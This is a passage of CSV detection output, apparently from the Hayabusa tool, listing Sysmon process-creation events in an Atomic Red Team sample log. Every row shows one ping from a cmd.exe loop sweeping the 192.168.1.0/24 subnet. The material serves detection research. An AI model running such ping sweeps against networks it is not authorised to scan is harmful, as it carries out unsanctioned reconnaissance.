+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.517 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.011 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.539 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.022 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
